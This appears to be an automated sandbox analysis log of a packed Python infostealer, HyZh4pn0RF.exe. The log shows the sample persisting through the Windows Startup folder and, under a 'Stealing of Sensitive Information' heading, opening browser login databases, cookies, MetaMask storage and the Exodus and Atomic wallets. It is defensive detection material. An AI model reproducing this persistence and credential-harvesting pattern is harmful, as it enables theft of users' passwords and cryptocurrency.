            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Util VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\certifi VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522 VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522 VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522 VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522 VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522 VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\_bz2.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522 VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\_lzma.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522 VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F48C460 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF78F48C460
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F4A6370 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF78F4A6370

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2012652158.000001F3E3C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.1959532011.000001F3E36D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.1958967533.000001F3E36A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.1958731140.000001F3E3403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.1959293524.000001F3E36B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.1958528378.000001F3E363E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1783368757.000002539B404000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: HyZh4pn0RF.exe PID: 4040, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
